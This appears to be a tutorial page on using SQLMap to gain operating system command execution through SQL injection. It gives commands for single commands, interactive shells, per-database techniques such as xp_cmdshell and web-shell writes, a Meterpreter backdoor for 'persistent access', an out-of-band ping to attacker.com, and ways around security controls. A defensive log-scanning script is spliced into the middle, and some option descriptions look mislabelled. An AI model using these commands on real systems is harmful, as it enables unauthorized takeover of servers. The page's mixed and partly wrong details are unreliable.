OS Command Execution
Learn how to execute operating system commands through SQL injection vulnerabilities using SQLMap
SQLMap provides several methods to execute operating system commands on the target server through SQL injection vulnerabilities. Which techniques are available depends on the database management system and on the privileges of the database user the application connects with.
Basic OS Command Execution
Single Command Execution (--os-cmd)
To execute a single operating system command:
sqlmap -u "http://www.example.com/vuln.php?id=1" --os-cmd="whoami"
This executes the specified command and returns its output. It's useful for quick verification of command execution capabilities.
Interactive OS Shell (--os-shell)
To obtain an interactive shell:
sqlmap -u "http://www.example.com/vuln.php?id=1" --os-shell
This provides an interactive command prompt where you can execute multiple commands on the target system.
DBMS-Specific Techniques
Different database systems have different mechanisms for command execution:
MySQL
For MySQL, SQLMap typically uses:
- SELECT ... INTO OUTFILE to write a web shell
- User-defined functions (UDFs) if the database user has sufficient privileges
sqlmap -u "http://www.example.com/vuln.php?id=1" --os-shell --dbms=mysql
Microsoft SQL Server
For SQL Server, SQLMap uses:
- The xp_cmdshell extended stored procedure
- CLR assemblies if xp_cmdshell is disabled
sqlmap -u "http://www.example.com/vuln.php?id=1" --os-shell --dbms=mssql
PostgreSQL
For PostgreSQL, SQLMap uses:
- COPY TO/FROM PROGRAM functionality
- Custom user-defined functions
sqlmap -u "http://www.example.com/vuln.php?id=1" --os-shell --dbms=postgresql
Oracle
For Oracle, SQLMap uses:
- Java stored procedures
- External tables
- PL/SQL packages
sqlmap -u "http://www.example.com/vuln.php?id=1" --os-shell --dbms=oracle
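As a defensive counterpart to the DBMS-specific primitives listed above, the following is an added detection example (not part of this page and not SQLMap's own code): it scans database query-log lines for the OS-execution primitives named in this section (INTO OUTFILE and UDF loading, xp_cmdshell and CLR assemblies, COPY TO/FROM PROGRAM and C-language functions, Oracle Java sources and external tables), after normalising case, comments and whitespace. The log line format, user names and sample queries are constructed assumptions.

```python
import re

# OS-execution primitives per DBMS, as named on this page: (label, regex).
# Regexes run against the normalised query produced by normalise().
PRIMITIVES = {
    "mysql": [("INTO OUTFILE/DUMPFILE write", r"\binto\s+(out|dump)file\b"),
              ("UDF load (CREATE FUNCTION ... SONAME)", r"\bcreate\s+function\b.*\bsoname\b")],
    "mssql": [("xp_cmdshell call", r"\bxp_cmdshell\b"),
              ("xp_cmdshell enabled via sp_configure", r"\bsp_configure\b.*\bxp_cmdshell\b"),
              ("CLR assembly load", r"\bcreate\s+assembly\b")],
    "postgresql": [("COPY TO/FROM PROGRAM", r"\bcopy\b.*\b(to|from)\s+program\b"),
                   ("C-language UDF", r"\bcreate\s+(or\s+replace\s+)?function\b.*\blanguage\s+c\b")],
    "oracle": [("Java stored procedure", r"\bdbms_java\b|\bjava\s+source\b"),
               ("external table", r"\borganization\s+external\b")],
}

def normalise(sql):
    """Lower-case, drop /* */ and -- comments, collapse whitespace (heuristic)."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    sql = re.sub(r"--[^\n]*", " ", sql)
    return re.sub(r"\s+", " ", sql).strip().lower()

def classify(dbms, sql):
    """Return the labels of every primitive the query matches for this DBMS."""
    q = normalise(sql)
    return [label for label, rx in PRIMITIVES.get(dbms.lower(), []) if re.search(rx, q)]

# Assumed (constructed) log format: <timestamp> dbms=<name> user=<user> query=<sql>
LINE_RE = re.compile(r"^(?P<ts>\S+) dbms=(?P<dbms>\S+) user=(?P<user>\S+) query=(?P<sql>.*)$")

def scan(lines):
    """Return one finding per log line that uses an OS-execution primitive."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        labels = classify(m["dbms"], m["sql"]) if m else []
        if labels:
            hits.append({"ts": m["ts"], "dbms": m["dbms"], "user": m["user"], "labels": labels})
    return hits

# Constructed sample lines, not real traffic. The MSSQL line hides the keyword
# behind an inline comment, which normalise() strips before matching.
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z dbms=mysql user=app query=SELECT id, name FROM users WHERE id=1",
    "2024-05-01T10:00:02Z dbms=mysql user=app query=SELECT 'x' INTO OUTFILE '/var/www/html/c.php'",
    "2024-05-01T10:00:03Z dbms=mssql user=sa query=EXEC/**/master..xp_cmdshell 'whoami'",
    "2024-05-01T10:00:04Z dbms=postgresql user=pg query=Copy tmp From Program 'id'",
    "2024-05-01T10:00:05Z dbms=oracle user=sys query=CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED \"c\" AS public class c {}",
]
```

Running scan(SAMPLE_LOG) flags the last four lines, each with the DBMS-specific label that matched; in practice the findings would be correlated with the application's expected query set, since a legitimate ETL job may use COPY or INTO OUTFILE.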
Advanced Command Execution Options
Specifying Command Prompt Type
You can specify the type of shell to use, here combined with the Metasploit path and a temporary directory on the target:
sqlmap -u "http://www.example.com/vuln.php?id=1" --os-shell --os-pwn --msf-path=/path/to/metasploit --tmp-path=/tmp
Out-of-Band Command Execution
For situations where the command's output cannot be retrieved directly:
sqlmap -u "http://www.example.com/vuln.php?id=1" --os-cmd="ping -c 4 attacker.com" --technique=T
This executes commands that produce observable side effects (like network connections) rather than direct output.
Establishing Persistent Access
Meterpreter Shell (--os-pwn)
To establish a Meterpreter session using Metasploit:
sqlmap -u "http://www.example.com/vuln.php?id=1" --os-pwn --msf-path=/path/to/metasploit
This creates a more sophisticated backdoor using Metasploit's capabilities.
Custom Backdoor (--os-smbrelay)
To create a custom backdoor:
sqlmap -u "http://www.example.com/vuln.php?id=1" --os-smbrelay
Troubleshooting Command Execution
If command execution fails, try these approaches:
- Verify the database user has sufficient privileges
- Try different command execution techniques with --technique
- Use stacked queries if supported by the injection point
- Try different output retrieval methods with --tmp-path
- Check if antivirus or security controls are blocking execution
Remember that command execution capabilities vary significantly based on:
- The specific DBMS version
- Database user privileges
- Server configuration
- Security controls in place